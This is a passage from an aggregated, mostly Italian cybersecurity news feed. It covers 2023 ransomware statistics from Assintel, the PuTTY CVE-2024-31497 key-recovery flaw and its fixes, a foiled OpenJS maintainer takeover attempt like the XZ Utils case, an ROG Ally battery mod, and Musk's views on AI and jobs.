È rilevante notare che il 61% di tali attacchi proviene esclusivamente dal Dark Web, sottolineando la necessità di monitorare fonti non convenzionali. L’analisi stagionale degli attacchi ha rivelato un picco durante la primavera, con il mese di aprile che ha registrato il maggior numero di offensive, seguito da marzo, novembre, luglio e giugno. Invece, gennaio e febbraio hanno mostrato una minore attività criminale. Il cybercrime ha rappresentato la principale minaccia, costituendo il 93% degli attacchi totali nel 2023. Sebbene le categorie legate a spionaggio e guerra dell’informazione sembrino in diminuzione, l’hacktivism è leggermente aumentato.

Settori come il manifatturiero, il professionale/scientifico/tecnico, l’ICT, il sanitario e il finanziario/assicurativo sono stati tra i più colpiti dagli attacchi. Inoltre, si è osservato un significativo aumento degli attacchi verso il continente americano, che ha rappresentato il 50% degli attacchi totali nel 2023, seguito da Europa, Asia e Africa. Le tecniche più utilizzate dagli attaccanti includono il malware, che ha rappresentato il 70% del totale degli attacchi, seguito dall’utilizzo di vulnerabilità e tecniche sconosciute. Circa un quarto degli attacchi ha avuto impatti critici, mentre il 67% ha causato impatti gravi, indicando un aumento degli attacchi con conseguenze economiche, legali o reputazionali catastrofiche per le vittime. Il Cyber Think Tank di Assintel ha sottolineato l’urgente necessità di rafforzare le misure di sicurezza informatica e promuovere la collaborazione tra pubblico e privato per contrastare efficacemente questa crescente minaccia alla sicurezza digitale.

Rimane una minaccia rilevante il ransomware. Nel primo trimestre del 2023, si è registrato un significativo aumento degli attacchi mirati al furto di dati e alla richiesta di riscatti. Le gang ransomware hanno causato gravi danni economici e reputazionali, con un aumento del 19% nel numero di vittime rispetto al trimestre precedente. In particolare, l’Italia ha visto un aumento dell’85.7% delle vittime rispetto al quarto trimestre del 2022.

Nel secondo trimestre del 2023, il numero di vittime di attacchi ransomware è aumentato del 62% rispetto al trimestre precedente, con le PMI che rappresentano l’80% delle vittime. Le aziende di servizi sono state le più colpite dalle gang ransomware, con il 47% delle vittime. Parallelamente agli attacchi di ransomware, il phishing ha continuato a rappresentare una minaccia significativa per la sicurezza informatica durante tutto l’anno 2023, con attaccanti che utilizzano metodi sempre più sofisticati per ottenere informazioni sensibili.

Nel secondo semestre del 2023, il trend degli attacchi ransomware è proseguito, con un totale di 2.616 vittime registrate in 94 paesi diversi. Le gang ransomware hanno continuato a essere attive, con un totale di 52 gruppi identificati. Gli Stati Uniti sono stati il paese più colpito, seguiti dal Regno Unito, dal Canada, dalla Germania e dall’Italia.

Pierguido Iezzi, CEO di Swascan (Tinexta Cyber) e coordinatore del Cyber Think Tank di Assintel, ha sottolineato la crescente vulnerabilità delle aziende di tutte le dimensioni e l’importanza di adottare un approccio olistico alla difesa informatica, che includa misure preventive e proattive. In un panorama sempre più complesso e minaccioso per le PMI, il ruolo delle associazioni nel settore della Cyber Security diventa cruciale. Il Cyber Think Tank di Assintel si impegna quindi a fornire un supporto più efficace alle PMI nel campo della Cyber Security, ampliando e consolidando l’ecosistema delle Aziende Cyber Assintel.

Inoltre, offre un supporto prezioso alle PMI per gestire i rischi cyber, dalla tecnologia alla conformità legale, mantenendole costantemente aggiornate sulle nuove normative e sulle tecnologie disponibili per migliorare la loro sicurezza informatica. Fa eco a queste parole il Presidente di Assintel, Paola Generali: “L’associazionismo è una leva competitiva cruciale per le PMI, permettendo loro di condividere conoscenze e risorse e di fare fronte comune alle sfide trasversali che le interessano. Inoltre, le associazioni svolgono un ruolo fondamentale nel rappresentare le istanze delle PMI a livello istituzionale e nell’interagire con le autorità competenti”.

In un contesto in cui la cybersecurity diventa sempre più cruciale, l’impegno collettivo diventa essenziale per garantire la sicurezza dei dati e delle infrastrutture digitali.

L'articolo Aumento del 85.7% del fenomeno Ransomware in Italia. Lo riporta il Cyber Think Tank Assintel proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 08:00:32

A ROG Ally Battery Mod You Ought To Try

Today’s hack is an unexpected but appreciated contribution from members of the iFixit crew, published by [Shahram Mokhtari]. This is an ROG Ally Asus-produced handheld gaming console mod that has you upgrade the battery to an aftermarket battery from an Asus laptop to double your battery life (40 Wh to 88 Wh).

There are two main things you need to do: replace the back cover with a 3D printed version that accommodates the new battery, and move the battery wires into the shell of an old connector. No soldering or crimping needed — just take the wires out of the old connector, one by one, and put them into a new connector. Once that is done and you reassemble your handheld, everything just works; the battery is recognized by the OS, can be charged, runs the handheld wonderfully all the same, and the only downside is that your ROG Ally becomes a bit thicker.

The best part is, it’s hard to fail at applying this mod, as it’s documented to the high standards we’d expect from iFixit. The entire journey is split into detailed steps, there’s no shortage of pictures, and the group has also added warnings for the few potentially problematic aspects you want to watch out for. Plus, in the comment section, we’ve learned that there’s an entire community called AllyMods dedicated to ROG Ally modding that has spawned creations like the dual display mod, which is a joy to see!

This mod reminds us of the time someone modified a Nintendo Game Boy Advance SP with a thicker shell too, not just extending the battery, but also adding things like Bluetooth and 3.5 mm audio, USB-C and wireless charging. A worthy upgrade for a beloved device!

Cybersecurity & cyberwarfare

2024-04-17 07:04:44

Gli sviluppatori di PuTTY avvertono di una grave falla di sicurezza. Le chiavi sono compromesse

Gli sviluppatori di PuTTY avvertono di una vulnerabilità critica che colpisce le versioni da 0.68 a 0.80. La falla potrebbe consentire a un utente malintenzionato di recuperare completamente le chiavi private NIST-P521.

La vulnerabilità CVE-2024-31497 si verifica a causa di errori nella generazione di numeri crittografici ECDSA, che consentono il recupero delle chiavi private. La scoperta dell’errore è attribuita ai ricercatori Fabian Bäumer e Markus Brinkmann dell’Università della Ruhr di Bochum

I primi 9 bit di ciascun nonce ECDSA sono zero, consentendo il recupero completo della chiave privata da circa 60 firme utilizzando tecniche all’avanguardia.

Un utente malintenzionato che possiede diverse dozzine di messaggi firmati e una chiave pubblica avrà dati sufficienti per recuperare la chiave privata e falsificare le firme, il che può portare ad un accesso non autorizzato ai server e ai servizi che utilizzano questa chiave.

Il problema ha interessato anche altri prodotti integrati con versioni vulnerabili di PuTTY:

• FileZilla (3.24.1 – 3.66.5);
• WinSCP (5.9.5 – 6.3.2);
• TortoiseGit (2.4.0.2 – 2.15.0);
• TartarugaSVN (1.10.0 – 1.14.6).

In seguito alla divulgazione responsabile, il problema è stato risolto nelle nuove versioni di PuTTY 0.81, FileZilla 3.67.0, WinSCP 6.3.3 e TortoiseGit 2.15.0.1.

Gli sviluppatori del prodotto hanno utilizzato la tecnica RFC 6979 per generare tutti i tipi di chiavi DSA ed ECDSA, abbandonando il metodo precedente. Si consiglia agli utenti TortoiseSVN di utilizzare Plink dall’ultima versione PuTTY 0.81 quando accedono ai repository SVN tramite SSH fino al rilascio dell’aggiornamento.

Le chiavi ECDSA NIST-P521 utilizzate in uno qualsiasi dei componenti interessati devono essere considerate compromesse e immediatamente revocate rimuovendole da “~/.ssh/authorized_keys” e file simili su altri server SSH.

L'articolo Gli sviluppatori di PuTTY avvertono di una grave falla di sicurezza. Le chiavi sono compromesse proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 05:28:58

Il Futuro del Lavoro Secondo Elon Musk: Rivoluzione Tecnologica o Caos Sociale?

L’ultima previsione di Elon Musk sul futuro del lavoro sembra in parti uguali utopica e in qualche modo terrificante. Intervenendo a un vertice sull’intelligenza artificiale nel novembre 2023, l’eccentrico miliardario ha affermato che l’intelligenza artificiale avanzata alla fine sarà in grado di “fare tutto” quando si tratta di lavoro e occupazione.

“Arriverà un punto in cui non sarà più necessario alcun lavoro”, ha detto al primo ministro britannico Rishi Sunak. “Puoi avere un lavoro se vuoi soddisfazione personale, ma l’intelligenza artificiale sarà in grado di fare tutto.”

Per chiunque la cui identità e il cui sostentamento siano legati alla propria carriera, potrebbe essere una pillola difficile da ingoiare. Mentre Musk prevede che l’intelligenza artificiale renderà il lavoro umano facoltativo piuttosto che obbligatorio per la sopravvivenza, insiste che questa automazione della forza lavoro darà vita a quella che definisce “un’era di abbondanza”.

L’idea è che i sistemi di intelligenza artificiale iper-intelligenti agiranno come “geni magici” onniscienti, fornendo tutti i beni, servizi, istruzione di cui potremmo aver bisogno o che desideriamo. Niente più carenze, solo tanto per tutti senza dover lavorare.

Per compensare la crisi occupazionale, Musk sta spingendo qualcosa chiamato “reddito alto universale”. A differenza dei regimi di reddito minimo di base, questo fornirebbe a tutti un sostegno finanziario più generoso e dignitoso, senza fare domande. “Sarà una sorta di pareggio”, ha detto.

Sembra idilliaco in teoria. Ma ovviamente non tutti sono della sua idea. Esperti come Julia Hobsbawm lanciano un allarme. “Temo che il signor Musk sia un utopista irrealistico”, ha condiviso con GOBankingRates. “Come molti nel mondo della tecnologia, sostiene che sostituire gli esseri umani sul posto di lavoro sia inevitabile e auspicabile. Non lo è assolutamente”.

Hobsbawm sostiene che l’attenzione dovrebbe concentrarsi sulla formazione adeguata dei lavoratori per collaborare con i sistemi di intelligenza artificiale, non semplicemente consegnare loro un assegno mentre i robot prendono il sopravvento. “Il lavoro conta nella nostra vita”, insiste.

Quindi “l’era dell’abbondanza” di Musk è un vero scorcio di un futuro basato sull’intelligenza artificiale in cui nessuno dovrà lavorare? Oppure stiamo andando verso una disoccupazione di massa e un collasso sociale? Ad altri esperti piace Alessandra Levit, autore di “Humanity Works”, la quale adotta una visione più misurata.

“Penso che abbia ragione… in un certo senso”, disse Levit. “Probabilmente avremo una forma di reddito di base e l’intelligenza artificiale automatizzerà parte dei posti di lavoro. Ma non accadrà da un giorno all’altro o in modo così estremo come suggerisce Musk”.

Levit prevede che, sebbene l’intelligenza artificiale avrà un impatto enorme su tutti i settori, creerà anche nuove opportunità di lavoro che non possiamo ancora immaginare. “Credo che emergeranno ruoli abbastanza nuovi da far sì che gli esseri umani non smetteranno del tutto di lavorare”.

L'articolo Il Futuro del Lavoro Secondo Elon Musk: Rivoluzione Tecnologica o Caos Sociale? proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 04:41:05

Letta to recommend creation of EU Deep Tech Stock Exchange

Europe's stock market are plagued by problems that prevent deep tech startups from getting the funding they need, Letta wrote.

---

https://www.euractiv.com/section/digital/news/letta-to-recommend-creation-of-eu-deep-tech-stock-exchange/

Cybersecurity & cyberwarfare

2024-04-17 05:02:30

OpenJS nel mirino. Sventata una nuova backdoor simile a XZ Utils

Recentemente gli esperti di sicurezza informatica hanno sventato con successo un tentativo di hackeraggio di un progetto sulla piattaforma OpenJS, che in termini generali è molto simile al recente incidente di backdoor nell’utilità di compressione XZ Utils.

Lunedì 15 aprile la OpenJS Foundation, un’organizzazione no-profit che monitora i progetti JavaScript utilizzati da miliardi di siti in tutto il mondo, ha ricevuto una serie di e-mail sospette. I mittenti hanno chiesto di aggiornare urgentemente uno dei progetti popolari per eliminare le vulnerabilità critiche, senza specificare i dettagli.

Robin Bender Ginn di OpenJS e Omkar Arasaratnam della Open Source Security Foundation hanno riferito che gli autori della lettera hanno insistito per essere nominati nuovi manager di un popolare progetto (nome omesso), nonostante non avessero alcuna precedente esperienza di lavoro su di esso.

Gli esperti hanno notato la somiglianza dei metodi con le azioni dell’hacker di nome Jia Tan, del quale abbiamo parlato recentemente. Era Jia Tang, la cui identità poteva nascondere un’intera squadra di hacker esperti, in precedenza era riuscita a introdurre una backdoor nell’utility XZ Utils.

Ginn e Arasaratnam hanno sottolineato che a nessuno di coloro che hanno presentato domanda è stato concesso un accesso privilegiato al progetto, poiché gli esperti sospettavano subito che qualcosa non andasse.

Secondo Chris Hughes di Endor Labs, circa un quarto di tutti i progetti di sicurezza informatica hanno un manager e il 94% dei progetti ne ha meno di dieci. Ha osservato che l’ecosistema del software open source è estremamente eterogeneo e vulnerabile a causa della dipendenza globale da sviluppatori anonimi.

I funzionari della CISA Jack Cable e Aeva Black hanno espresso la necessità di ripensare gli approcci alla sicurezza nella produzione tecnologica. Sostengono che le aziende che utilizzano software open source dovrebbero contribuire alla sostenibilità dell’ecosistema, anche finanziariamente o attraverso il tempo degli sviluppatori.

Arasaratnam ha anche annunciato i piani della Linux Foundation per sviluppare linee guida specifiche per i project manager che potrebbero dover affrontare aggressivi tentativi di acquisizione. Ha inoltre sottolineato l’importanza di sostenere i manager nella lotta contro l’ingegneria sociale e la manipolazione, che possono potenzialmente portare a conseguenze molto gravi.

L'articolo OpenJS nel mirino. Sventata una nuova backdoor simile a XZ Utils proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-17 05:00:58

The EU Must Seize its Opportunity to Inspire, Not Regulate, Innovation [Promoted content]

New leadership must determine which policies can help Europe balance sustainability and competitiveness by reaping the benefits of innovation at a time of acute global challenges. The next mandate must ensure technology-driven businesses can thrive in Europe while upholding the Union's fundamental values.

---

https://www.euractiv.com/section/digital/opinion/the-eu-must-seize-its-opportunity-to-inspire-not-regulate-innovation/